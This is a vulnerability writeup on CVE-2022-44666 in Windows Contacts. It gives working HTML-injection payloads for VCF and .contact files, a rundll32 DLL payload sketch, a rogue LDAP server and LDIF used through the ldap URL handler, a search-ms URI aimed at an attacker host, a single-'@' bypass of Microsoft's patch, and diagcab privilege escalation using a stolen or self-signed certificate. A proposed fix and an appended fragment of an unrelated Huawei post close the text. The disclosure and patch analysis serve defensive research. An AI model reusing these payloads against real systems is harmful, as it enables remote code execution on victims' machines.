Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day).

Original text by j00sean

This is the story about another forgotten 0day fully disclosed more than 4 years ago by John Page (aka hyp3rlinx). To understand the report, you have to consider i’m stupid 🙂 And my stupidicity drives me to take longer paths to solve simple issues, but it also leads me to figure out another ways to exploit some bugs. Why do i say this? Because i was unable to quickly understand that the way to create a .contact file is just browsing to Contact folder in order to create the contact, instead of that, i used this info to first create a VCF file and then, i wrongly thought that this was some type of variant. That was also because of my brain can’t understand some 0days are forgotten for so long time ¯\(ツ)/¯ Once done that and after the «wontfix» replies by MSRC and ZDI, further investigations were made to increase the severity, finally reaching out .contact files and windows url protocol handler «ldap».

Details

  • Vendor: Microsoft.
  • App: Microsoft Windows Contacts.
  • Version: 10.0.19044.1826.
  • Tested systems: Windows 10 & Windows 11.
  • Tested system versions: Microsoft Windows [Version 10.0.19044.1826] & Microsoft Windows [Version 10.0.22000.795]

Intro

It all started while I was reading the exploit code for this vulnerability, which was actually released as a 0day; it's also possible to find ZDI's report.

Update 2022/07/21: After reporting this case to MS, MSRC folks rightly pointed out to me that Windows Contacts isn't the default program to open VCF files.

Further research still demonstrates that the default program for VCF files on Win7 ESU & WinServer2019 is Windows Contacts (wab.exe); otherwise, MS People (PeopleApp.exe) is used. Here is a full summary of this testing:

  • Windows 7: Default program for VCF files is Windows Contacts (wab.exe).
  • Windows Server 2019: Default program for VCF files is Windows Contacts (wab.exe).
  • Windows 10: Default program for VCF files is MS People (PeopleApp.exe).
  • Windows 10 + MS Office: Default program for VCF files is MS Outlook (outlook.exe).
  • Windows 11: Default program for VCF files is MS People (PeopleApp.exe).

Anyway, they still argue there's some social engineering involved, such as opening a crafted VCF file and clicking on some links to exploit the bug, so it doesn't meet the MSRC bug bar for a security update.

Update 2022/07/25: Well, after further research, it's the same bug. I've finally been able to build a .contact proof of concept: it's actually possible to get a .contact file parsed correctly by using HTML entities. Note this solves the previous issue (Update 2022/07/21), and this file format (.contact) is opened by Windows Contacts, the default program for this file extension, even when MS Office is installed on the system. It just needs an initial file association if that hasn't been done yet, but the only program installed by default to do that is Windows Contacts.
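
For illustration, this is roughly what such a .contact file looks like; the payload goes XML-escaped into the URL value. This sketch is reconstructed from the Windows Contacts XML schema as I remember it, so element names and the placeholder GUIDs may need adjusting against a real exported contact:

<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <c:NameCollection>
    <c:Name c:ElementID="00000000-0000-0000-0000-000000000001">
      <c:FormattedName>John Doe</c:FormattedName>
    </c:Name>
  </c:NameCollection>
  <c:UrlCollection>
    <c:Url c:ElementID="00000000-0000-0000-0000-000000000002">
      <c:Value>&quot;&gt;&lt;/a&gt;&lt;a href=&quot;notepad&quot;&gt;CLICKMEEEEE...&lt;/a&gt;</c:Value>
      <c:LabelCollection><c:Label>Business</c:Label></c:LabelCollection>
    </c:Url>
  </c:UrlCollection>
</c:contact>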

Update 2022/07/25: This further research got me to a point I had been trying to reach for some time: using a URL protocol handler to automatically open crafted contact data to exploit the bug. I finally got it working thanks to the ldap URI scheme, which is associated by default with the Windows Contacts application. So, just by setting up a rogue LDAP server and serving the payload data in the mail, url or wwwhomepage attributes, the impact is increased: there's no longer any need to double-click a malicious VCF/Contact file, since it can be delivered through URL protocols.

Update 2023/02/08: As a gesture of goodwill by MSRC, John Page (aka hyp3rlinx) has been included in the acknowledgement page for CVE-2022-44666 discovery.

Description

The report is basically the same as in the links above, but I've improved the social engineering involved a bit. In fact, the first thing I did was improve the way the links are displayed: just as if it were an XSS vulnerability, this is actually HTML injection, so it's possible to close the first anchor element and insert a new one. Then I wanted to remove the visibility of those HTML elements, and setting an «innerHTML» as long as possible is enough to hide them (because there are char limits).

This is the final payload used:

URL;WORK:"></a><a href="notepad">CLICKMEEEEE...</a>

To watch what happens, run procmon and set up a fake target for the href attribute like this:

URL;WORK:"></a><a href="foo.exe">CLICKMEEEEE...</a>

Once the link is clicked, output like the following is observed in procmon:

This is the stack trace for the first «CreateFile» operation:

0	FLTMGR.SYS	FltpPerformPreCallbacksWorker + 0x36c	0xfffff806675a666c	C:\WINDOWS\System32\drivers\FLTMGR.SYS
1	FLTMGR.SYS	FltpPassThroughInternal + 0xca	0xfffff806675a611a	C:\WINDOWS\System32\drivers\FLTMGR.SYS
2	FLTMGR.SYS	FltpCreate + 0x310	0xfffff806675dc0c0	C:\WINDOWS\System32\drivers\FLTMGR.SYS
3	ntoskrnl.exe	IofCallDriver + 0x55	0xfffff8066904e565	C:\WINDOWS\system32\ntoskrnl.exe
4	ntoskrnl.exe	IoCallDriverWithTracing + 0x34	0xfffff8066909c224	C:\WINDOWS\system32\ntoskrnl.exe
5	ntoskrnl.exe	IopParseDevice + 0x117d	0xfffff806694256bd	C:\WINDOWS\system32\ntoskrnl.exe
6	ntoskrnl.exe	ObpLookupObjectName + 0x3fe	0xfffff8066941329e	C:\WINDOWS\system32\ntoskrnl.exe
7	ntoskrnl.exe	ObOpenObjectByNameEx + 0x1fa	0xfffff806694355fa	C:\WINDOWS\system32\ntoskrnl.exe
8	ntoskrnl.exe	NtQueryAttributesFile + 0x1c5	0xfffff80669501125	C:\WINDOWS\system32\ntoskrnl.exe
9	ntoskrnl.exe	KiSystemServiceCopyEnd + 0x25	0xfffff806692097b5	C:\WINDOWS\system32\ntoskrnl.exe
10	ntdll.dll	NtQueryAttributesFile + 0x14	0x7ff8f0aed4e4	C:\Windows\System32\ntdll.dll
11	KernelBase.dll	GetFileAttributesW + 0x85	0x7ff8ee19c045	C:\Windows\System32\KernelBase.dll
12	shlwapi.dll	PathFileExistsAndAttributesW + 0x5a	0x7ff8ef20212a	C:\Windows\System32\shlwapi.dll
13	shlwapi.dll	PathFileExistsDefExtAndAttributesW + 0xa1	0x7ff8ef2022b1	C:\Windows\System32\shlwapi.dll
14	shlwapi.dll	PathFileExistsDefExtW + 0x3f	0x7ff8ef2021ef	C:\Windows\System32\shlwapi.dll
15	shlwapi.dll	PathFindOnPathExW + 0x2f7	0x7ff8ef201f77	C:\Windows\System32\shlwapi.dll
16	shell32.dll	PathResolve + 0x154	0x7ff8eebb0954	C:\Windows\System32\shell32.dll
17	shell32.dll	CShellExecute::QualifyFileIfNeeded + 0x105	0x7ff8eebb05c9	C:\Windows\System32\shell32.dll
18	shell32.dll	CShellExecute::ValidateAndResolveFileIfNeeded + 0x5e	0x7ff8eeb1e422	C:\Windows\System32\shell32.dll
19	shell32.dll	CShellExecute::_DoExecute + 0x6d	0x7ff8eeb1e1cd	C:\Windows\System32\shell32.dll
20	shell32.dll	<lambda_519a2c088cd7d0cdfafe5aad47e70646>::<lambda_invoker_cdecl> + 0x2d	0x7ff8eeb09fed	C:\Windows\System32\shell32.dll
21	SHCore.dll	_WrapperThreadProc + 0xe9	0x7ff8f098bf69	C:\Windows\System32\SHCore.dll
22	kernel32.dll	BaseThreadInitThunk + 0x14	0x7ff8f07e7034	C:\Windows\System32\kernel32.dll
23	ntdll.dll	RtlUserThreadStart + 0x21	0x7ff8f0aa2651	C:\Windows\System32\ntdll.dll

Setting a breakpoint in Shell32!ShellExecuteExW, we can have a clearer picture of the functions involved:

CommandLine: "C:\Program Files\Windows Mail\wab.exe" /vcard C:\Users\admin\Documents\vcf-0day\exploit.vcf
...
ModLoad: 00007ff7`c7d50000 00007ff7`c7dd5000   wab.exe 
...
0:000> bp SHELL32!ShellExecuteExW
...
Breakpoint 0 hit
SHELL32!ShellExecuteExW:
00007ff8`eeb20e40 48895c2410      mov     qword ptr [rsp+10h],rbx ss:000000d8`dc2dae88=0000000000090622
0:000> k
 # Child-SP          RetAddr           Call Site
00 000000d8`dc2dae78 00007ff8`d3afee27 SHELL32!ShellExecuteExW
01 000000d8`dc2dae80 00007ff8`d3ad7802 wab32!SafeExecute+0x143
02 000000d8`dc2dbf90 00007ff8`ef3b2920 wab32!fnSummaryProc+0x1c2
03 000000d8`dc2dbfc0 00007ff8`ef3b20c2 USER32!UserCallDlgProcCheckWow+0x144
04 000000d8`dc2dc0a0 00007ff8`ef3b1fd6 USER32!DefDlgProcWorker+0xd2
05 000000d8`dc2dc160 00007ff8`ef3ae858 USER32!DefDlgProcW+0x36
06 000000d8`dc2dc1a0 00007ff8`ef3ade1b USER32!UserCallWinProcCheckWow+0x2f8
07 000000d8`dc2dc330 00007ff8`ef3ad68a USER32!SendMessageWorker+0x70b
08 000000d8`dc2dc3d0 00007ff8`d93a6579 USER32!SendMessageW+0xda
09 000000d8`dc2dc420 00007ff8`d93a62e7 comctl32!CLink::SendNotify+0x12d
0a 000000d8`dc2dd560 00007ff8`d9384bb8 comctl32!CLink::Notify+0x77
0b 000000d8`dc2dd590 00007ff8`d935add2 comctl32!CMarkup::OnButtonUp+0x78
0c 000000d8`dc2dd5e0 00007ff8`ef3ae858 comctl32!CLink::WndProc+0x86ff2
0d 000000d8`dc2dd6f0 00007ff8`ef3ae299 USER32!UserCallWinProcCheckWow+0x2f8
0e 000000d8`dc2dd880 00007ff8`ef3ac050 USER32!DispatchMessageWorker+0x249
0f 000000d8`dc2dd900 00007ff8`d92b6317 USER32!IsDialogMessageW+0x280
10 000000d8`dc2dd990 00007ff8`d92b61b3 comctl32!Prop_IsDialogMessage+0x4b
11 000000d8`dc2dd9d0 00007ff8`d92b5e2d comctl32!_RealPropertySheet+0x2bb
12 000000d8`dc2ddaa0 00007ff8`d3acfb68 comctl32!_PropertySheet+0x49
13 000000d8`dc2ddad0 00007ff8`d3ace871 wab32!CreateDetailsPropertySheet+0x930
14 000000d8`dc2de140 00007ff8`d3ad68f5 wab32!HrShowOneOffDetails+0x4f5
15 000000d8`dc2de390 00007ff8`d3af800f wab32!HrShowOneOffDetailsOnVCard+0xed
16 000000d8`dc2de400 00007ff7`c7d51b16 wab32!WABObjectInternal::VCardDisplay+0xbf
17 000000d8`dc2de450 00007ff7`c7d52c28 wab!WinMain+0x896
18 000000d8`dc2dfab0 00007ff8`f07e7034 wab!__mainCRTStartup+0x1a0
19 000000d8`dc2dfb70 00007ff8`f0aa2651 KERNEL32!BaseThreadInitThunk+0x14
1a 000000d8`dc2dfba0 00000000`00000000 ntdll!RtlUserThreadStart+0x21

And this is the pseudo-code involved:

__int64 __fastcall fnSummaryProc(HWND hWnd, int a2, WPARAM a3, LONG_PTR a4)
{

...

      default:
        if ( !((v22 + 4) & 0xFFFFFFFD) && *(_WORD *)(v5 + 136) )
          SafeExecute(v7, (const unsigned __int16 *)v9, (const unsigned __int16 *)(v5 + 136)); <== FOLLOW THIS PATH
        break;
    }
  }
  return 1i64;
}


__int64 __fastcall SafeExecute(HWND a1, const unsigned __int16 *a2, const unsigned __int16 *a3)
{
  const unsigned __int16 *v3; // rbx
  HWND v4; // rdi
  unsigned int v5; // ebx
  BOOL v6; // ebx
  __int64 v7; // rdx
  OLECHAR *v8; // rax
  signed int v10; // eax
  DWORD pcchCanonicalized; // [rsp+20h] [rbp-E0h]
  SHELLEXECUTEINFOW pExecInfo; // [rsp+30h] [rbp-D0h]
  OLECHAR Dst[2088]; // [rsp+A0h] [rbp-60h]

  v3 = a3;
  v4 = a1;
  memset_0(Dst, 0, 0x1048ui64);
  pcchCanonicalized = 2084;
  v5 = UrlCanonicalizeW(v3, Dst, &pcchCanonicalized, 0);
  if ( (v5 & 0x80000000) == 0 )
  {
    v6 = UrlIsW(Dst, URLIS_FILEURL);
    pExecInfo.hProcess = 0i64;
    pExecInfo.hwnd = 0i64;
    pExecInfo.lpVerb = 0i64;
    _mm_store_si128((__m128i *)&pExecInfo.lpParameters, (__m128i)0i64);
    *(_OWORD *)&pExecInfo.hInstApp = 0i64;
    *(_OWORD *)&pExecInfo.lpClass = 0i64;
    *(_OWORD *)&pExecInfo.dwHotKey = 0i64;
    if ( !ShellExecuteExW(&pExecInfo) ) <== CALL HERE
    {
      v10 = GetLastError();
      v5 = (unsigned __int16)v10 | 0x80070000;
      if ( v10 <= 0 )
        v5 = v10;
    }
  }
  ...
}

After this, it's clear the issue actually involves the SysLink control in the comctl32.dll library and the way the href attribute is parsed by the wab32.dll library.

It isn't possible to use remote shared locations or WebDAV shares to exploit this:

URL;WORK:"></a><a href="\\127.0.0.1@80\test\payload.exe">CLICKMEEEEE...</a>
URL;WORK:"></a><a href="\\vboxsvr\test\payload.exe">CLICKMEEEEE...</a>

The file information is queried, but the file is never executed.

It’s possible to use relative paths such as:

URL;WORK:"></a><a href="foo\foo.exe">CLICKMEEEEE...</a>

Example:

URL;WORK:"></a><a href="hidden\payload.exe">CLICKMEEEEE...</a>

Going further, while testing rundll32 as an attack vector, I noticed it was not possible to pass arguments to the selected payload executable. However, using a .lnk file that targets a chosen executable, it was possible to use command-line arguments. It's a bit tricky, but it works.

URL;WORK:"></a><a href="hidden\run.lnk">CLICKMEEEEE...</a>

Target of run.lnk:

rundll32.exe hidden\payload.bin,Foo

This looks more interesting because there's no need to drop an executable on the target system.
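
As a reference, here is a minimal sketch of what the payload DLL could look like; this is an assumption about how ./src/dllmain.cpp might be structured, not the original source. rundll32 loads the library regardless of its extension (hence payload.bin) and calls the named export, which must follow this canonical prototype:

// dllmain.cpp: payload DLL sketch for "rundll32.exe hidden\payload.bin,Foo"
#include <windows.h>

// rundll32 invokes the export with this signature
extern "C" __declspec(dllexport) void CALLBACK Foo(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    // proof-of-concept action: just pop notepad
    WinExec("notepad.exe", SW_SHOWNORMAL);
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    return TRUE;
}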

Impact

Remote code execution as the currently logged-on user.

Proofs of Concept

A file association has to exist for Windows Contacts to open .vcf files.

Update 2022/07/25: For Contact files (.contact) there is only one application to open them by default: Windows Contacts, even when MS Office is installed on the target system.

Using files located in ./report-pocs/:

  1. Double-click the file exploit.vcf (Update 2022/07/25: Or double-click the file exploit.contact).
  2. Do a single click on one of the «click-me» links.
  3. It launches notepad.exe using different execution paths:
    • 3.1. Link 1: Run .lnk file that triggers rundll32 with a crafted library.
    • 3.2. Link 2: This triggers the execution of an executable located in folder «hidden» as a local path.
    • 3.3. Link 3: Directly.

There are a couple of videos attached in ./videos:

/videos/full-payload.gif: This is a more complex example which downloads a zip file that allows triggering all the payloads.

This is a summary of the proof of concept files located in ./report-pocs/:

And files located in ./src:

  • dllmain.cpp: DLL library used as payload (payload.bin).
  • payload.cpp: Executable used as payload (payload.exe).

Further exploitation

For further exploitation, and since the vulnerability doesn't allow loading files from remote shared locations, the «search-ms» URI protocol is an interesting vector. You'll find proofs of concept which only trigger a local binary like calc or notepad, and more complex proofs of concept that I've named weaponized exploits, because they don't execute local files. These pocs & exploits are located in ./further-pocs/.
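
For reference, a search-ms URI of this kind (server name and parameters purely illustrative) makes Explorer render an attacker-controlled remote share as if it were a local search result:

search-ms:query=hotfix&crumb=location:\\attacker.example\share&displayname=Critical%20Updates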

This is a summary of target applications:

In order to reproduce:

  1. Set up a remote shared location (SMB or WebDAV). Copy the content of ./further-pocs/to-copy-in-remote-shared-location/ into it.
  2. If desired, hide the files by running ./further-pocs/to-copy-in-remote-shared-location/setup-hidden.bat.
  3. Modify the file exploit.html/poc.html located in ./further-pocs/[vector or target app]/remote-weaponized-by-searchms/ to point to your remote shared location.
  4. Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/[poc||remote-weaponized-by-searchms]/.
  5. Run the poc/exploit files depending on the case.
  6. For further info, watch the videos located in ./videos:

6.2. Exploit for browsers: ./videos/browsers-exploit.gif.

6.3. PoC for MS Word: ./videos/msword-poc.gif.

6.4. Exploit for MS Word: ./videos/msword-exploit.gif.

6.5. PoC for PDF Readers: ./videos/pdfreaders-poc.gif.

6.6. Exploit for PDF Readers: ./videos/pdfreaders-exploit.gif.

Additionally, these are all the files for further exploitation:

Contact Files

After receiving the Update 2022/07/21 reply from MSRC, I decided to take a look at the Contact file extension, as it would confirm whether or not it's the same case as the one found by the original discoverer, and of course it is. My first proof of concept was just using a different file format, but the bug is the same. Just using wabmig.exe, located in «C:\Program Files\Windows Mail», it's possible to convert all the VCF files to Contact files.

And as mentioned in the intro updates, these files are opened by Windows Contacts (default program).

The steps to reproduce are the same as those used for VCF files. The same restrictions observed with VCF files apply to Contact files; that is, it's not possible to use remote shared locations in the «href» attribute, but it's still possible to use local paths or the «search-ms» URL protocol.

These are all the files added or modified to exploit Contact files:

URL protocol LDAP

As mentioned above, this further research got me to a point I had been trying to reach for some time: using a URL protocol handler to automatically open crafted contact data to exploit the bug. This challenge was finally achieved thanks to the ldap URI scheme.

...
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\LDAP]
@="URL:LDAP Protocol"
"EditFlags"=hex:02,00,00,00
"URL Protocol"=""

[HKEY_CLASSES_ROOT\LDAP\Clsid]
@="{228D9A81-C302-11cf-9AA4-00AA004A5691}"

[HKEY_CLASSES_ROOT\LDAP\shell]

[HKEY_CLASSES_ROOT\LDAP\shell\open]

[HKEY_CLASSES_ROOT\LDAP\shell\open\command]
@=hex(2):22,00,25,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,46,00,69,00,6c,\
  00,65,00,73,00,25,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,20,00,\
  4d,00,61,00,69,00,6c,00,5c,00,77,00,61,00,62,00,2e,00,65,00,78,00,65,00,22,\
  00,20,00,22,00,2f,00,6c,00,64,00,61,00,70,00,3a,00,25,00,31,00,22,00,00,00
...

That is:

"%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1"

So, just by setting up a rogue LDAP server and serving the payload data, it's possible to use this URL protocol handler to launch Windows Contacts (wab.exe) with a malicious payload in the LDIF attributes mail, url or wwwhomepage. Note that I was unable to get this working with the «wwwhomepage» attribute as indicated here, but it should theoretically work.
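
A hypothetical delivery link (host and DN purely illustrative; the exact URL form wab.exe accepts is an assumption on my side) would then look like:

ldap://attacker.example.org/cn=Microsoft,ou=people,dc=example,dc=org

When the victim follows it, the handler launches wab.exe with «/ldap:<url>», Windows Contacts queries the rogue server, and the returned entry is rendered with the injected links.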

The crafted ldif content is just something like this:

...
dn: dc=org
dc: org
objectClass: dcObject

dn: dc=example,dc=org
dc: example
objectClass: dcObject
objectClass: organization

dn: ou=people,dc=example,dc=org
objectClass: organizationalUnit
ou: people

dn: cn=Microsoft,ou=people,dc=example,dc=org
cn: Microsoft
gn: Microsoft
company: Microsoft
title: Microsoft KB5001337-hotfix
mail:"></a><a href="..\hidden\payload.lnk">Run-installer...</a>
url:"></a><a href="..\hidden\payload.exe">Run-installer...</a>
wwwhomepage:"></a><a href="notepad">Run-installer...</a>
objectclass: top
objectclass: person
objectClass: inetOrgPerson
...

And the code for the rogue LDAP server was borrowed from the ldaptor project's quick-start server, located over here.

This is a summary of target applications:

  • Browsers: MS Edge, Google Chrome, Mozilla Firefox & Opera.
  • MS Word.
  • PDF Readers (mainly Adobe Acrobat Reader DC & Foxit PDF Reader).

The steps to reproduce are:

  1. Copy ./further-pocs into a remote shared location (SMB or WebDAV).
  2. If desired, hide the files by running ./further-pocs/MSWord/setup-hidden.bat.
  3. Install ldaptor via pip: pip install ldaptor. Note this has been tested on Python 2.7 x64.
  4. Start the rogue LDAP server located in ./further-pocs/ldap-rogue-server/ldap-server.py.
  5. Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/url-protocol-ldap/.
  6. Run the exploit files depending on the case.
  7. For further info, watch the videos located in ./videos:

7.2. For MS Word: ./videos/ldap-msword-exploit.gif.

7.3. For PDF Readers: ./videos/ldap-pdfreaders-exploit.gif.

These are the additional files to exploit the ldap URL protocol:

CVE-2022-44666: Patch analysis and incomplete fix

On Dec 13, 2022 the patch for this vulnerability was released by Microsoft as CVE-2022-44666.

The versions used for diffing the patch (located in C:\Program Files\Common Files\System\wab32.dll) have been:

  • MD5: 588A3D68F89ABF1884BEB7267F274A8B (pre-patch)
  • MD5: D1708215AD2624E666AFD97D97720E81 (post-patch)

Diffing the affected library (wab32.dll) with Diaphora by @matalaz, we find some new functions:

And these are the partial matches:

Taking a look into the new code in function «fnSummaryProc»:

__int64 __fastcall fnSummaryProc(HWND a1, int a2, WPARAM a3, LONG_PTR a4)
{

...

    if ( v26 <= 0x824 && (!v23 ? (v27 = 0) : (v27 = IsValidWebsiteUrlScheme(v23)), v27) )  // (1)
    {
      v38 = (unsigned __int16 *)2085;
      v39 = &CPercentEncodeRFC3986::`vftable';
      v40 = v23;
      v41 = v26;
      v28 = CPercentEncodeString::Encode(
              (CPercentEncodeString *)&v39,
              (unsigned __int16 *)&Dst,
              (unsigned __int64 *)&v38,
              v25);
      v29 = v7;
      if ( !v28 )
      {
        v30 = (const unsigned __int16 *)&Dst;
LABEL_44:
        SafeExecute(v29, v24, v30);  // (2)
        return 1i64;
      }
    }
    else
    {
      if ( v23 )
        v32 = IsInternetAddress(v23, &v38);
      else
        v32 = 0;
      v29 = v7;
      if ( v32 )
      {
        v30 = v23;
        goto LABEL_44; // (3)
      }
    }
    v31 = GetParent(v29);
    ShowMessageBox(v31, 0xFE1u, 0x30u); // (4)
    return 1i64;
  }
  ...
}

After the fix, the new code either calls the function «SafeExecute» (2) or shows a message box (4).

To reach the call to the function «SafeExecute» (2), it's possible to follow the code flow in (1):

_BOOL8 __fastcall IsValidWebsiteUrlScheme(LPCWSTR pszIn)
{
  const WCHAR *v1; // rbx
  _BOOL8 result; // rax
  DWORD pcchOut; // [rsp+30h] [rbp-68h]
  char Dst; // [rsp+40h] [rbp-58h]

  v1 = pszIn;
  result = 0;
  if ( UrlIsW(pszIn, URLIS_URL) ) // (5)
  {
    memset_0(&Dst, 0, 0x40ui64);
    pcchOut = 32;
    if ( UrlGetPartW(v1, (LPWSTR)&Dst, &pcchOut, 1u, 0) >= 0
      && (!(unsigned int)StrCmpICW(&Dst, L"http") || !(unsigned int)StrCmpICW(&Dst, L"https")) )  // (6)
    {
      result = 1;
    }
  }
  return result;
}

This function first checks whether the URL is valid in (5); then it checks whether or not its scheme is «http» or «https» in (6). This code path looks safe enough. Coming back to the function «fnSummaryProc», there's another code path that could help to bypass the fix, in (3).

__int64 __fastcall IsInternetAddress(unsigned __int16 *a1, unsigned __int16 **a2)
{
  unsigned __int16 v2; // ax
  unsigned __int16 **v3; // r14
  unsigned __int16 *v4; // rdi
  unsigned __int16 *v5; // r15
  unsigned __int16 v6; // dx
  unsigned __int16 *v7; // r8
  unsigned __int16 *v8; // rcx
  WCHAR v9; // ax
  _WORD *v10; // rsi
  int v11; // ebp
  LPWSTR v12; // rax
  unsigned __int16 *v14; // rax

  v2 = *a1;
  v3 = a2;
  v4 = a1;
  v5 = a1;
  while ( v2 && v2 != 0x3C )
  {
    a1 = CharNextW(a1);
    v2 = *a1;
  }
  v6 = *a1;
  v7 = a1;
  if ( *a1 )
  {
    v8 = a1 + 1;
    v4 = v8;
  }
  else
  {
    v8 = v4;
  }
  v9 = *v8;
  v10 = (_WORD *)((unsigned __int64)v7 & -(__int64)(v6 != 0));
  v11 = v6 != 0;
  if ( *v8 & 0xFFBF )
  {
    while ( v9 <= 0x7Fu && v9 != 0xD && v9 != 0xA )
    {
      if ( v9 == 0x40 )  // (7)
      {
        v14 = CharNextW(v8);
        if ( !(unsigned int)IsDomainName(v14, v11, v3 != 0i64) )  // (8)
          return 0i64;
        if ( v3 )
        {
          if ( v10 )
          {
            *v10 = 0;
            TrimSpaces(v5);
          }
          *v3 = v4;
        }
        return 1i64;
      }
      v12 = CharNextW(v8);
      v8 = v12;
      v9 = *v12;
      if ( !v9 )
        return 0i64;
    }
  }
  return 0i64;
}

One thing caught my attention in (7), where the code checks whether a «@» char exists. Then, it calls the function «IsDomainName» in order to check whether or not the string after the «@» char is a domain name:

__int64 __fastcall IsDomainName(unsigned __int16 *a1, int a2, int a3)
{
  int v3; // edi
  int v4; // ebx
  int v5; // er9
  __int64 v6; // rdx

  v3 = a3;
  v4 = a2;
  if ( !a1 )
    return 0i64;
LABEL_2:
  v5 = *a1;
  if ( !(_WORD)v5 || (_WORD)v5 == 0x2E || v4 && (_WORD)v5 == 0x3E )
    return 0i64;
  while ( (_WORD)v5 && (!v4 || (_WORD)v5 != 0x3E) )
  {
    if ( (unsigned __int16)v5 >= 0x80u )
      return 0i64;
    if ( (unsigned __int16)(v5 - 10) <= 0x36u )
    {
      v6 = 19140298416324617i64;
      if ( _bittest64(&v6, (unsigned int)(v5 - 10)) )
        return 0i64;
    }
    if ( (_WORD)v5 == 46 )
    {
      a1 = CharNextW(a1);
      if ( a1 )
        goto LABEL_2;
      return 0i64;
    }
    a1 = CharNextW(a1);
    v5 = *a1;
  }
  if ( v4 )
  {
    if ( (_WORD)v5 != 0x3E )
      return 0i64;
    if ( v3 )
      *a1 = 0;
  }
  return 1i64;
}

So the bypass for the fix is pretty simple: it's just necessary to use a single «@» char. SysLink href attributes like these will successfully bypass the fix:

hidden\@payload.lnk
hidden\@payload.exe
hidden@payload.lnk
hidden@payload.exe
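
Combining the original injection with this bypass, a post-patch payload line is just the old one with an «@» slipped into the path (path illustrative):

URL;WORK:"></a><a href="hidden\@payload.exe">CLICKMEEEEE...</a>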

For further info, there’s a video for a standalone contact file.

Proof of concept located in ./bypass/report-pocs.

And another one for MS Word and LDAP url protocol.

Proof of concept located in ./bypass/further-pocs.

One day after the patch release, this information was sent to MSRC. Unfortunately, the case has recently been closed with no further info about it.

Diagcab file as payload

After CVE-2022-30190, also known as the Follina vulnerability, and CVE-2022-34713, also known as the DogWalk vulnerability, a publicly known but underrated technique was reborn thanks to @buffaloverflow. My mate and friend Eduardo Braun Prado gave me the idea of using this technique here.

There are some pre-requirements to do this:

  1. The target user has to belong to the administrators group. If not, there's a UAC prompt.
  2. The diagcab file has to be signed, so the code-signing certificate must have been installed on the target computer.

A real attack scenario would involve stealing a code-signing certificate that is actually trusted on the target system. But as this is just a proof of concept, a self-signed code-signing certificate was generated and used to sign the diagcab file, named @payload.diagcab.
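
For reference, this is one way to produce and use such a certificate; these PowerShell/signtool commands are a sketch, not necessarily the exact ones used for this PoC:

New-SelfSignedCertificate -Type CodeSigningCert -Subject "CN=FakeVendor" -CertStoreLocation Cert:\CurrentUser\My
signtool sign /n "FakeVendor" /fd SHA256 @payload.diagcab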

So in order to reproduce, the certificate located in cert.cer needs to be installed under the Trusted Root Certification Authorities store like this:

To finally elevate privileges, token stealing/impersonation could be used. In this case, the «parent process» technique was chosen. A modified version of this script was included inside the resolver scripts.

For further info, there’s a video for MS Word and LDAP url protocol.

Proof of concept located in ./bypass/diagcab-pocs.

Proposed fix

Remember the vulnerable code in the function «fnSummaryProc»:

...
LABEL_44:
        SafeExecute(v29, v24, v30); // Vulnerable call to shellexecute
        return 1i64;
      }
    }
    else
    {
      if ( v23 )
        v32 = IsInternetAddress(v23, &v38); // Bypass with a single "@"
      else
        v32 = 0;
      v29 = v7;
      if ( v32 )
      {
        v30 = v23;
        goto LABEL_44;
      }
    }
...

The function «IsInternetAddress» was intentionally created to check whether the href attribute corresponds to an email address. So my proposed fix (sticking to the functions the library already imports) would be:

...
      if (v32 && !(unsigned int)StrCmpNICW(L"mailto:", v23, 7i64)) // Check that the href really starts with "mailto:"
      {
          v30 = v23;
          goto LABEL_44;
      }
...

As simple as that: it's only necessary to perform this check before calling «SafeExecute». Just by testing that the target string (v23) starts with «mailto:», the bug would be fully fixed, IMHO.

Unofficial fix

Some days/weeks ago I contacted @mkolsek of 0patch, who by the way is always very kind to me, to inform him about this issue. He told me it has been receiving an unofficial fix for Windows 7 since then (4 years ago). That was a surprise and good news!

It was tested and successfully stopped the new variant of CVE-2022-44666. The micropatch prepends «http://» to the attacker-controlled string passed via the href attribute if it doesn't start with «mailto:», «http://» or «https://», which is enough to fully fix the issue. Now it's going to be extended to the latest Windows versions; only some offsets need to be updated.
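
In pseudo-code, the described micropatch logic would be something like the following sketch (my reconstruction, not 0patch's actual code):

WCHAR fixedUrl[2084];
if ( StrCmpNICW(href, L"mailto:", 7) && StrCmpNICW(href, L"http://", 7) && StrCmpNICW(href, L"https://", 8) )
{
    // no whitelisted scheme: force the string to be treated as a web URL
    StringCchPrintfW(fixedUrl, ARRAYSIZE(fixedUrl), L"http://%s", href);
    href = fixedUrl;
}
// href is now safe to pass down to SafeExecute/ShellExecuteExW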

Either way, it would be better to get an official patch.

Acknowledgments

  • @hyp3rlinx: Special shout out and acknowledgement, because he began this research some years ago and his work was essential for this writeup. He should also have been credited for finding this out, but unfortunately I was unable to contact him in time. That has now been done (Update 2023/02/08).
  • @Edu_Braun_0day: who also worked around this issue.
  • @mkolsek.
  • @matalaz.
  • @buffaloverflow.
  • @msftsecresponse.

By @j00sean

[BugTales] REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB

Original text by Lorant Szabo

Last year we published UnZiploc, our research into Huawei’s OTA update implementation. Back then, we successfully identified logic vulnerabilities in the implementation of the Huawei recovery image that allowed root privilege code execution to be achieved by remote or local attackers. After Huawei fixed the vulnerabilities we reported, we decided to take a second look at the new and improved recovery mode update process.

This time, we managed to identify a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Our advisory for the vulnerability is published here.

The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, we describe how we went about creating “FaultyUSB” — a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive — and exploiting this vulnerability to achieve arbitrary code execution as root!

